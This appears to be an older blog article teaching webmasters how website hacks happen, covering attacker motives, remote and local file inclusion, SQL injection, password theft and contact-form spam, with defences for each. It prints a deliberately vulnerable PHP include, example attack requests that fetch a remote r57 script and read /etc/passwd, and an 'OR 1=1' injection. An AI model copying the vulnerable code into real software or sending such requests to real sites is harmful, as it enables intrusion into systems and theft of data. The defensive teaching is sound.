What is a website hack? Basic information to help webmasters block hackers.
http://25yearsofprogramming.com/blog/2008/20080311.htm
This provides background information for a set of articles that begins at:
* Website security: what to do after your site is hacked, and how to prevent it.
http://25yearsofprogramming.com/blog/20070705.htm
What is a website hack? Basic information to help webmasters block hackers.
The files of your website are stored on a computer somewhere. The computer, called a "server" or "web server", is not too much different from your home PC, except that its configuration is specialized for making files available to the world wide web, so it has a lot of hard drive capacity and a very high speed internet connection. It probably doesn't have its own monitor or keyboard because everyone who communicates with it does so through its internet connection, just like you do.
With everybody connecting to your site through the internet, it might seem like just an accident if one of your files gets changed once in a while in all the commotion, but it's not.
Your website and server have several security systems that determine what kind of access each person has. You are the owner, so you have passwords that give you read/write access to your site. You can view files (read) and you can also change them (write). Everybody else only has read access. They can view your files, but they are never, ever supposed to be able to change them, delete them, or add new ones.
A hack occurs when somebody gets through these security systems and obtains write access to your server, the same kind you have. Once they obtain that, they can change, add, or delete files however they want. If you can imagine someone breaking into your home and sitting down at your PC with a box of installation CD's, that's what a website hack is like. They might do only a little damage, or a lot. The choice is up to them.
People often ask, "But how could my page, which was 100% pure HTML, have been hacked?"
The answer is that the defacement of the page wasn't the hack. The hack was when they got write access to the server. The "pure HTML" page had nothing at all to do with that.
Altering the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING, including alter your pages that are pure HTML. That is the reason why, after a hack, the most important thing isn't repairing the damage they did (which most people focus on), but finding out how they got in.
Who are the hackers?
Website hacking is one of the modern enterprises of organized crime, but if you think that means it's being done amateurishly by a bunch of elderly mobsters who took night classes in Computer ABC's to learn what "this Internet Explore thing is", think again. These organizations have professional programmers. Their campaigns to take control of thousands of the world's computers are well planned and sophisticated, drawing on an in-depth knowledge of operating system software, browser vulnerabilities, programming, and even psychology, and their attacks are almost always automated.
Strangely enough, if your site was hacked, it probably wasn't done by a person, but by another computer, which was hacked by another computer, which was hacked by yet another, and somewhere way back in the chain is a programmer who initially unleashed the sequence of events that set all these computers to attacking each other and building a giant network, a "botnet", a massively parallel virtual supercomputer whose purpose is to suck up all of the world's information that the criminals can efficiently turn into money. They need to have as many computers as possible recruited into the enterprise, and that's why they wanted to hack your little website.
Other hackers do it, whether they realize it or not, as affiliates of organized crime. Using tools provided by the larger organization, they get a small commission ($5, last I heard) for each website they successfully break into.
And there are still hackers who are motivated by fun, challenge, and prestige among their peers or by the desire to deface the site of someone they dislike, but their numbers and impact today are dwarfed by the commercial robotic crawling operations.
Why do they do it? What do they want?
What they want is money. While you may be racking your brain and tearing your hair out trying to figure out how to monetize your website, these people already know just how to do it, and they have a plan, too. You can't use the same monetization methods they do because all their methods are illegal!
To use your server to make money, in approximate order of decreasing value and decreasing incidence of occurrence, they want:
1. Your visitors' confidential financial information. One way or another, they want credit card, Social Security, and other information from the people who trustingly visit your site. Credit card numbers are sold in bulk to brokers who resell them. More complete financial information is used in identity theft schemes involving mortgages or car loans.
Theft methods:
* They install malicious content on your website so that your visitors are attacked with viruses, Trojans, keyloggers, and other spyware. Once on the PCs, the malware either searches for the data it wants, or keyloggers capture passwords as users log into their bank accounts. The stolen data is relayed to remote computers using the victim's internet connection. In spite of the availability of antivirus and antispyware software, many home PCs are still poorly protected, and one of the sophisticated attack packages (MPack) claims that it successfully infects 50% of the computers it attacks.
* They copy your customer database.
* They install spyware or phishing pages in your site, to grab data as your customers log in.
2. Use of your visitors' computers. When they got into your server, they took control of one computer, but now they can attack all your visitors, too, and maybe get hundreds or thousands of new zombie computers under their control. One of the things that makes your server an attractive target is the opportunity to attack all these poorly protected PC's.
3. Your mail server, for sending spam.
4. Your server's high-speed internet connection, for relaying stolen data, spamming, communicating with other sites in a botnet, crawling the web searching for new websites to victimize, and attacking them.
5. Free use of your server's processing power, to reprogram however they want.
6. Free use of your webspace, to host illegal content or even an entire illegal website. They avoid webhosting fees, electricity bills, and can engage in activities that no webhost would allow, leaving you with the worries about TOS violations and legal liability. Even after you clean up the site and remove the content, it may remain indexed by search engines for months.
Examples:
* Phishing sites: they create a fake (spoof) site that looks like a popular one such as PayPal. Then they send spam emails containing links to the phishing page on your site. When victims log in, thinking it's PayPal, your site steals their login data and relays it to a remote computer. Then the thieves log into the real PayPal accounts and steal the money.
* Illegal pornographic content.
* Use your webspace to store PHP or Perl scripts like c99 or r57 for use in Remote File Inclusion (RFI) attacks on other sites, making your site look like the attacker.
7. Your traffic. They put visible links on your pages that visitors who trust your site are likely to follow. Or they install code to redirect all of your traffic to a different site. Either way, your visitors become their visitors.
8. Your money, by extortion, threatening to attack your site even worse if you don't pay them.
9. Your PageRank. By putting invisible outbound links on your pages (so only search engines see them) they inflate another site's inbound links and boost its PageRank. Appearing higher in search results makes more money for them.
10. Your advertising space. They monetize your popularity by inserting their ads onto your pages. Clicks are credited to them.
How do they do it?
They use whatever methods bring the most results, most efficiently, at any given time.
Almost all attacks are automated.
1) FTP password theft
In mid-2009, attacks known as "gumblar" and "martuz" have made FTP password theft (not FTP password guessing) the most common way websites get modified without their owner's permission.
The attacks take advantage of the fact that many of the poorly protected PCs in the world happen to belong to webmasters, whose website login information is stored on their personal computers. Although the primary purpose of gumblar/martuz is financial gain (by maliciously modifying Google search results so clicks on the links get redirected to malware or phishing sites), gumblar and martuz also search the victim's PC for FTP login passwords and relay them to a remote computer. The remote computer logs into the website and modifies the pages to install new copies of gumblar/martuz so it can propagate itself.
Gumblar/martuz can be prevented with antivirus protection.
2) Remote File Inclusion attacks (RFI)
Before gumblar/martuz, RFI attacks were the top threat.
A remote file inclusion attack tricks an already-running website script into fetching a malicious script from an outside website. The imported code becomes part of the executing script, so it runs as part of it. It can perform any actions allowed by the language, such as PHP. Thus it has almost unlimited ability to modify website files.
The reason RFI attacks are so widespread and so successful is that scripts vulnerable to RFI are everywhere. You could throw darts at random websites and hardly avoid hitting one with an RFI vulnerability, so it's no accident that's what most RFI attacks do. They randomly throw millions of RFI attacks at millions of websites, and successfully gain entry to large numbers of them.
One reason there are so many RFI-vulnerable websites is that web applications such as blogs, forums, image galleries, content management systems (CMS), and shopping carts are often very complex with thousands of lines of code, some of it from before the days when RFI was a serious threat and some of it written by programmers who accidentally forgot to program defensively and guard against RFI even if they knew they should. These applications are used by millions of websites, so a single RFI vulnerability turns many sites into good targets.
Another reason is that many sites contain PHP code written by novice programmers unaware of the dangers of RFI.
Here is a hypothetical example of an RFI attack in PHP.
What does PHP code vulnerable to RFI look like?
For a dynamically-generated web page, a programmer might use a template for the overall layout, but store individual articles in separate files so that basic elements of every page look the same, but the article content of each is different. One way to accomplish this is with a PHP "include". It opens a file, reads it, and inserts its contents at the location of the "include" line:
//Pull the requested article into the template page
include($_GET['ArticleID']);
The value of ArticleID determines which article will be displayed on the page. For simplicity, we will assume that articles are stored in numbered files with no extensions: 1, 2, 3, ...
The value of ArticleID is set by whoever requests the page, by setting its value in the HTTP request, in its "query string" portion (the part after the question mark). To display article 1, you call this page with the following:
GET /Display.php?ArticleID=1
When Display.php starts running, the value of ArticleID automatically has the value 1.
When the value of ArticleID (which is 1) is substituted into the code from above, it results in this:
include(1);
Since 1 is the name of the file containing article 1, that article is pulled into the page, and it works!
The RFI vulnerability
There is a serious flaw in this code, however. ArticleID is never tested for being the name of an existing article, nor even for being a legal value. Let's see what happens when we do this:
GET /Display.php?ArticleID=http://remotesite.ru/r57.txt
When the value of ArticleID is substituted into the code from above, it results in this:
include(http://remotesite.ru/r57.txt);
Unless PHP is configured to prevent fetching URLs from remote servers, what this does is pull into the page, where an article should be, the r57.txt file from the distant website!
This is horrible. That remote file could be anything at all. In real attacks, it is usually a malicious PHP script. All of its code becomes part of the currently executing script (Display.php), and it runs. It can use every available function of PHP, and the amount of damage it can do is unlimited.
In practice, most attacks don't want to be noticed, so they do as little damage as possible. They install their malicious JavaScript, iframes, and viruses (which is bad enough), but leave everything else alone.
What does an RFI attack look like in my website access logs?
In your website access logs, a typical RFI attack looks like this:
GET /Display.php?ArticleID=http://remotesite.ru/r57.txt
* The name of the file being called. It might be the name of a page on your site, or not. These automated attacks use a shotgun approach. They will attack your site with known WordPress exploits without bothering to check whether you use WordPress or not.
* (Everything after the first question mark is called the query string. Its data will be passed to PHP or ASP.NET, or whatever you use.)
* The name of a variable. It might be the name of a variable your script actually uses, or not.
* The most important part, the remote file. It is the URL (web address) of a file on another website, which they want your script to fetch and execute.
There are at least three ways to prevent RFI:
1. Change your code to act only on legitimate data of the type expected, and to do nothing when it receives a URL (web address) in place of legitimate data.
2. Set allow_url_fopen = Off in your PHP configuration. With this setting, PHP will not allow include() to retrieve files from remote servers, even if it encounters code that says it should do so.
3. Use .htaccess rules to block a HTTP request if it has a web address in the query string.
3) Local File Inclusion attacks (LFI)
LFI attacks are almost the same as RFI, except they try to trick a web page into displaying the contents of your server's important system files that are normally inaccessible.
An LFI attack looks like this in your website access logs:
GET /Display.php?ArticleID=/../etc/passwd
* The name of the file being called.
* The name of a variable.
* The relative path to a file on your server that they want to see on the output page.
When the value of ArticleID is substituted into the code from above, it results in this:
include(/../etc/passwd);
This pulls into the page, where an article should be, the contents of a password file. The password is encrypted (hashed), but once the attackers have its text, they can use high-speed offline techniques to decrypt it.
LFI attacks can also be blocked, by good coding practices and .htaccess rules.
4) SQL injection attacks
SQL injection attacks are similar to RFI and LFI (above), except they attack web pages that use Structured Query Language for querying and manipulating databases such as MySQL. The attacks embed SQL commands in the HTTP query string to try to trick the system into divulging secret information or inserting malicious data into the database.
Using familiar code from the previous examples, one type of SQL injection attack could look similar to this in your website access logs:
GET /Display.php?ArticleID=OR 1=1;
The above line isn't really correct, and a full explanation of how it works isn't similar enough to the previous examples to belong here, so this is only a brief overview:
The intended target isn't a PHP include() command as it was previously. Instead, the target is SQL query code.
For our example, we'll use a common situation where a web page contains a search box for the visitor to enter search terms. The script then uses those terms to find matching entries in a database, and it displays the results on the output page.
Assume that the PHP script is in our Display.php page, above, and it uses SQL to construct and perform the database search. There is a snippet of SQL code in the script for doing the search, but it is only partial. It lacks the specific search terms, which it expects to get later from the user.
After the user types the search terms and clicks the Submit button, the Display.php page receives its request. The user's search terms are in the HTTP query string. The script takes the search terms, combines them with the SQL code snippet it already had, searches the database, and outputs the result.
It is necessary for the script to carefully check what the user entered because it's being mixed into an existing SQL query. If the user entered only valid search terms, there's no problem, but if the user entered SQL code, it could become part of the query itself and transform it into a completely different one that does a lot more than just search the database for a few words.
In our simple example above, if the basic query was supposed to retrieve and display some user data for one user, the injection of the new partial SQL string "OR 1=1" causes it to display data for all users. This is because "1=1" is always true, so every record in the database is a match, and the output page will contain your entire database.
Another common SQL injection method uses code in the query string to build SQL data-altering commands. It visits every record in every database table and inserts malicious JavaScript or iframe code into all of them. Later, when the server fetches data from the database to put on a page, the malicious code is embedded in the data. A mass-attack called Asprox used this method.
The solution in our simple example is that if the page expects a query string like "ArticleID=1234", the code must perform its database action only if the incoming data consists entirely of numeric digits. If any other characters are present, it should quit and do nothing. Other prevention strategies are more complicated.
5) Password attacks
Besides gumblar, there are other ways attackers can get a site's password:
* Eavesdrop on unencrypted FTP sessions passing through a home wireless network or public hot spot.
* Repeatedly try to log in with different userID/password combinations, hoping to guess the correct one.
* Steal user account login data from a webhosting company.
Failed attempts might or might not show in the site's FTP logs. Successful break-ins look the same as the activity of an authorized user, except the IP address is an unknown one.
6) Form mail spamming
Contact forms on web pages are sometimes hijacked to send spam. A compromise of this type is not really a hack because it doesn't give read/write access to an unauthorized user, but it does trick the site into doing something it shouldn't.
Emails are surprisingly simple, and are plain text. Each address header such as To and From is terminated by a CRLF sequence. It is therefore easy for someone filling out a contact form to insert text that creates an entire list of recipients (instead of just one) or that inserts additional headers such as BCC, unless the script that processes the contact form is written to prohibit these injections.
It is not actually the form (on the web page) that is vulnerable to attack. When a user completes and submits the form, the data is sent to a script on the website, called a forms handler, that processes the data and sends the email. It is that script that is vulnerable.
Once the spammers find a vulnerable script, they don't bother filling out the form manually. They write a program that submits data directly to the site's form mail processing script, over and over again, turning the site into a spammer.